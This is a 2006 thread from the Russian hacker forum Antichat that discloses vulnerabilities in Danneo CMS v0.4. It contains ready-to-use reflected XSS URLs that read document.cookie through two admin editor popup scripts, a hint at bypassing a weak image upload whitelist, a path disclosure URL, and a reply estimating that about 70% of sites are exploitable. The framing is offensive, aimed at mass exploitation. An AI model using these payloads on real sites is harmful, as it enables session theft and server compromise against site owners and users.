Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Многочисленные уязвимости Danneo CMS (https://forum.antichat.xyz/showthread.php?t=18037)

vectorg 22.04.2006 09:12

Многочисленные уязвимости Danneo CMS
 
DanneoCMS v.04
_http://danneo.com

1. xxs - куки

http://danneosite.com/apanel/editor/img_popup.php?img_url=%22%3E%3Cscript%3Ealert(docu ment.cookie)%3C/script%3E

http://danneosite.com/apanel/editor/file_popup.php?img_url=%22%3E%3Cscript%3Ealert(doc ument.cookie)%3C/script%3E

2. заливка файлов

http://danneosite.com/apanel/editor/...mg_library.php

защита слабенькая:

http://danneosite.com/apanel/editor/...rol.config.php -->

PHP код:

// allowed extentions for uploaded image files
$spaw_valid_imgs = array('gif''jpg''jpeg''png'); 

думайте сами =))

3. раскрытие путей

их много, самое простейшее:

http://danneosite.com/apanel/editor/scripts/demo.php


Antichat.ru © VectorG

kot777 22.04.2006 19:05

Хорошо поработал, насколько массова уязвимость?

vectorg 23.04.2006 16:38

пробив 70%
некоторые доступ к едитору закрывают


Время: 16:48